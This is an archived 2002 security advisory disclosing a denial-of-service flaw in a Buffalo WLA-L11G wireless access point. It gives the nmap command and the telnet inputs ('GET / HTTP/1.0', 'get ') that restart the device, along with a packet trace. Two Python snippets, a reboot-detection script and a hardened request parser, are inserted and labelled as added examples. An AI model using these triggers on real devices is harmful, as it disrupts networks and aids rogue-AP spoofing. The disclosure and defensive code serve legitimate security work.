[NEWS] Buffalo AP Denial of Service
From: support@securiteam.com
Date: 11/17/02
From: support@securiteam.com To: list@securiteam.com Date: 17 Nov 2002 20:57:34 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Buffalo AP Denial of Service
------------------------------------------------------------------------
SUMMARY
A vulnerability in Buffalo's AP allows remote attackers to cause it to stop
responding to legitimate requests simply by port scanning it.
DETAILS
Vulnerable systems:
* WLA-L11G version 2.31 (WLI-PCM-L11G Ver.6.14)
While performing network testing, we found a Buffalo Access Point
(WLA-L11G Ver.2.31) vulnerable to a Denial of Service (DoS) attack. Simply
using a network scanning tool such as NMap (www.insecure.org) with version
grabbing in the following manner restarts the AP:
$ nmap -sVVV -p 80 192.168.177.250
Where 192.168.177.250 is the IP address of the Buffalo AP. Analyzing the
network traffic shows the following:
14:16:14.622714 192.168.177.7.34968 > 192.168.177.250.www: S [tcp sum ok]
4001152576:4001152576(0) win 5840 <mss 1460,sackOK,timestamp 5143788 0,nop,wscale 0> (DF) [tos 0x10] (ttl 64, id 49836, len 60)
0x0000 4510 003c c2ac 4000 4006 5bad c0a8 4d07 E..<..@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be40 0000 0000 ..M....P.|.@....
0x0020 a002 16d0 6204 0000 0204 05b4 0402 080a ....b...........
0x0030 004e 7cec 0000 0000 0103 0300 .N|.........
14:16:14.623498 192.168.177.250.www > 192.168.177.7.34968: S [tcp sum ok]
51008176:51008176(0) ack 4001152577 win 16000 <mss 1460> (ttl 30, id 2, len 44)
0x0000 4500 002c 0002 0000 1e06 8078 c0a8 4dfa E..,.......x..M.
0x0010 c0a8 4d07 0050 8898 030a 52b0 ee7c be41 ..M..P....R..|.A
0x0020 6012 3e80 b1e2 0000 0204 05b4 0000 `.>...........
14:16:14.623539 192.168.177.7.34968 > 192.168.177.250.www: . [tcp sum ok]
1:1(0) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49837, len 40)
0x0000 4510 0028 c2ad 4000 4006 5bc0 c0a8 4d07 E..(..@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be41 030a 52b1 ..M....P.|.A..R.
0x0020 5010 16d0 f14f 0000 P....O..
14:16:15.402518 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok]
1:7(6) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49838, len 46)
0x0000 4510 002e c2ae 4000 4006 5bb9 c0a8 4d07 E.....@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be41 030a 52b1 ..M....P.|.A..R.
0x0020 5018 16d0 08b2 0000 6765 7420 0d0a P.......get...
14:16:15.647578 192.168.177.250.www > 192.168.177.7.34968: . [tcp sum ok]
1:1(0) ack 7 win 16000 (ttl 30, id 3, len 40)
0x0000 4500 0028 0003 0000 1e06 807b c0a8 4dfa E..(.......{..M.
0x0010 c0a8 4d07 0050 8898 030a 52b1 ee7c be47 ..M..P....R..|.G
0x0020 5010 3e80 c999 0000 0000 0000 0000 P.>...........
14:16:15.647639 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok]
7:9(2) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49839, len 42)
0x0000 4510 002a c2af 4000 4006 5bbc c0a8 4d07 E..*..@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1 ..M....P.|.G..R.
0x0020 5018 16d0 e435 0000 0d0a P....5....
14:16:16.358599 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok]
7:9(2) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49840, len 42)
0x0000 4510 002a c2b0 4000 4006 5bbb c0a8 4d07 E..*..@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1 ..M....P.|.G..R.
0x0020 5018 16d0 e435 0000 0d0a P....5....
14:16:17.750198 arp who-has 192.168.177.250 tell 192.168.177.250
0x0000 0001 0800 0604 0001 0007 4006 0656 c0a8 ..........@..V..
0x0010 4dfa 0000 0000 0000 c0a8 4dfa 0000 0000 M.........M.....
0x0020 0000 0000 0000 0000 0000 0000 0000 ..............
14:16:17.798596 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok]
7:9(2) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49841, len 42)
0x0000 4510 002a c2b1 4000 4006 5bba c0a8 4d07 E..*..@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1 ..M....P.|.G..R.
0x0020 5018 16d0 e435 0000 0d0a P....5....
14:16:20.274463 arp who-has 192.168.177.7 tell 192.168.177.250
0x0000 0001 0800 0604 0001 0007 4006 0656 c0a8 ..........@..V..
0x0010 4dfa 0000 0000 0000 c0a8 4d07 0000 0000 M.........M.....
0x0020 0000 0000 0000 0000 0000 0000 0000 ..............
14:16:20.274488 arp reply 192.168.177.7 is-at 0:4:5a:63:a4:be
0x0000 0001 0800 0604 0002 0004 5a63 a4be c0a8 ..........Zc....
0x0010 4d07 0007 4006 0656 c0a8 4dfa M...@..V..M.
14:16:20.275495 192.168.177.250.www > 192.168.177.7.34968: FR [tcp sum ok]
51008177:51008177(0) win 0 (ttl 30, id 1, len 40)
0x0000 4500 0028 0001 0000 1e06 807d c0a8 4dfa E..(.......}..M.
0x0010 c0a8 4d07 0050 8898 030a 52b1 0000 0000 ..M..P....R.....
0x0020 5005 0000 b4e9 0000 0000 0000 0000 P.............
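The capture above carries three signs that the AP lost all state mid-connection rather than merely closing the socket: the AP ARP-probes its own address (the duplicate-address check an interface performs when it comes up), its IP id counter falls from 3 back to 1, and it answers the still-open connection with a FIN/RST, window 0, carrying no ACK. The following Python script is an added example and is not part of the advisory or of Arhont's tooling; it parses tcpdump summary lines of the format printed above and reports those indicators for a chosen host. The sample input is constructed from the advisory's trace, re-joined onto one line per packet with the hex dumps omitted, and the regular expressions assume the tcpdump output format used in the advisory.

```python
import re

# Constructed sample input: the advisory's tcpdump summary lines, re-joined onto
# one line per packet with the hex dumps omitted.
TRACE = """\
14:16:14.622714 192.168.177.7.34968 > 192.168.177.250.www: S [tcp sum ok] 4001152576:4001152576(0) win 5840 <mss 1460,sackOK,timestamp 5143788 0,nop,wscale 0> (DF) [tos 0x10] (ttl 64, id 49836, len 60)
14:16:14.623498 192.168.177.250.www > 192.168.177.7.34968: S [tcp sum ok] 51008176:51008176(0) ack 4001152577 win 16000 <mss 1460> (ttl 30, id 2, len 44)
14:16:14.623539 192.168.177.7.34968 > 192.168.177.250.www: . [tcp sum ok] 1:1(0) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49837, len 40)
14:16:15.402518 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 1:7(6) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49838, len 46)
14:16:15.647578 192.168.177.250.www > 192.168.177.7.34968: . [tcp sum ok] 1:1(0) ack 7 win 16000 (ttl 30, id 3, len 40)
14:16:15.647639 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49839, len 42)
14:16:16.358599 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49840, len 42)
14:16:17.750198 arp who-has 192.168.177.250 tell 192.168.177.250
14:16:17.798596 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49841, len 42)
14:16:20.274463 arp who-has 192.168.177.7 tell 192.168.177.250
14:16:20.274488 arp reply 192.168.177.7 is-at 0:4:5a:63:a4:be
14:16:20.275495 192.168.177.250.www > 192.168.177.7.34968: FR [tcp sum ok] 51008177:51008177(0) win 0 (ttl 30, id 1, len 40)
"""

# Summary-line formats as printed by the tcpdump version used in the advisory
# (assumption of this example; newer tcpdump prints "Flags [S]" instead).
TCP_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\w+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\w+): (?P<flags>\S+) "
    r"\[tcp sum ok\] (?P<body>.*) \(ttl (?P<ttl>\d+), id (?P<id>\d+), len (?P<len>\d+)\)$"
)
ARP_RE = re.compile(r"^(?P<ts>\S+) arp who-has (?P<target>\S+) tell (?P<sender>\S+)$")


def parse(trace):
    """Yield one dict per TCP or ARP-request line; everything else is skipped."""
    for line in trace.splitlines():
        m = TCP_RE.match(line)
        if m:
            pkt = m.groupdict()
            pkt["kind"] = "tcp"
            pkt["id"] = int(pkt["id"])
            yield pkt
            continue
        m = ARP_RE.match(line)
        if m:
            pkt = m.groupdict()
            pkt["kind"] = "arp"
            yield pkt


def reboot_indicators(trace, host):
    """Return (timestamp, reason) findings suggesting `host` restarted during the capture."""
    findings = []
    last_id = None   # last IP id sent by host; most stacks count upwards
    acked = False    # host has acknowledged data, so it held connection state
    for pkt in parse(trace):
        if pkt["kind"] == "arp":
            # A host asking for its own address is doing the duplicate-address
            # probe an interface performs when it comes up.
            if pkt["target"] == host and pkt["sender"] == host:
                findings.append((pkt["ts"], "ARP probe for its own address"))
            continue
        if pkt["src"] != host:
            continue
        # An IP id far below the previous one (not a wrap near 65535) means the
        # counter was reinitialised.
        if last_id is not None and pkt["id"] < last_id and last_id < 60000:
            findings.append((pkt["ts"], f"IP id counter went backwards ({last_id} -> {pkt['id']})"))
        last_id = pkt["id"]
        # A reset carrying no ACK, after the host had acknowledged data on the
        # connection, is what a stack sends for a connection it no longer knows.
        if "R" in pkt["flags"] and acked and " ack " not in pkt["body"]:
            findings.append((pkt["ts"], "bare RST on a connection the host had acknowledged"))
        if " ack " in pkt["body"]:
            acked = True
    return findings


if __name__ == "__main__":
    for ts, why in reboot_indicators(TRACE, "192.168.177.250"):
        print(ts, why)
```

Run against the advisory's trace with the AP's address, the script reports the self-directed ARP at 14:16:17.750198 and, at 14:16:20.275495, both the id reset (3 -> 1) and the bare RST; run with the scanning host's address it reports nothing, which is the control a detection rule of this kind needs.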
The attack can also be reproduced manually via telnet:
andrei@192.168.177.7:~$ telnet 192.168.177.250 80
Trying 192.168.177.250...
Connected to 192.168.177.250 (192.168.177.250).
Escape character is '^]'.
GET / HTTP/1.0
Connection closed by foreign host.
And:
andrei@192.168.177.7:~$ telnet 192.168.177.250 80
Trying 192.168.177.250...
Connected to 192.168.177.250 (192.168.177.250).
Escape character is '^]'.
get
Connection closed by foreign host.
(Where there is a <space> after get; without the <space>, the AP does not
restart.)
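The advisory does not say why the AP restarts, and since "GET / HTTP/1.0" is a well-formed request line, whatever fails is not only request-line parsing. Still, the second trigger (a lowercase method followed by a single trailing space and no request-target) is exactly the edge case a minimal embedded HTTP parser tends to mishandle. The following function is an added example, not code from the advisory or from Buffalo's firmware; it shows how such a parser can bound its input and reject each malformed form with an HTTP error status instead of misbehaving on it. The line-length limit, the acceptance of HTTP/0.9 two-token requests, and the error codes chosen are assumptions of this example.

```python
import re

MAX_REQUEST_LINE = 1024   # assumed bound; every input to an embedded server needs one

_METHOD = re.compile(rb"^[A-Z]{1,16}$")      # methods are case-sensitive tokens
_VERSION = re.compile(rb"^HTTP/\d\.\d$")


def parse_request_line(raw):
    """Validate one raw HTTP request line.

    Returns (0, (method, target, version)) for a well-formed line and
    (status, None) with an HTTP error status otherwise. It never raises on any
    byte string, which is the property a small embedded server must have.
    """
    if len(raw) > MAX_REQUEST_LINE:
        return 414, None                       # line too long
    if not raw.endswith(b"\n"):
        return 400, None                       # unterminated line
    line = raw.rstrip(b"\r\n")
    # Reject control characters and non-ASCII bytes before any further parsing,
    # so the decode at the end cannot fail.
    if any(c < 0x20 or c > 0x7E for c in line):
        return 400, None
    parts = line.split(b" ")                   # exactly one SP between tokens
    if len(parts) == 2:
        parts.append(b"HTTP/0.9")              # simple-request form "METHOD target"
    if len(parts) != 3:
        return 400, None                       # "get" alone, or extra/missing tokens
    method, target, version = parts
    if not _METHOD.match(method):
        return 400, None                       # "get" is not a valid method token
    if not (target.startswith(b"/") or target == b"*"):
        return 400, None                       # empty target, as in "get " / "GET "
    if not _VERSION.match(version):
        return 400, None
    return 0, (method.decode("ascii"), target.decode("ascii"), version.decode("ascii"))


if __name__ == "__main__":
    for sample in (b"GET / HTTP/1.0\r\n", b"get \r\n", b"get\r\n", b"GET \r\n"):
        print(sample, "->", parse_request_line(sample))
```

The two telnet inputs from the advisory map onto distinct rejections: "get" with no space has a single token and fails the token-count check, while "get " splits into a method and an empty target and fails the method check first. The point is that every path returns a status rather than reaching code that assumes a non-empty target.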
Impact:
An attacker can use this vulnerability to restart the AP. This might be
useful if the attacker has already changed the configuration files and a
restart of the AP is required for the changes to take effect. It is also
possible to use this attack to spoof an AP and make clients connect to a
rogue or spoofed AP instead of the legitimate one.
Vendor response:
According to Arhont Ltd. policy, all found vulnerabilities and security
issues are reported to the manufacturer 7 days before release to the public
domain (such as CERT and BUGTRAQ).
If you would like more information about this issue, please do not hesitate
to contact the Arhont team.
ADDITIONAL INFORMATION
The information has been provided by Andrei Mikhailovsky
<mailto:andrei@arhont.com>.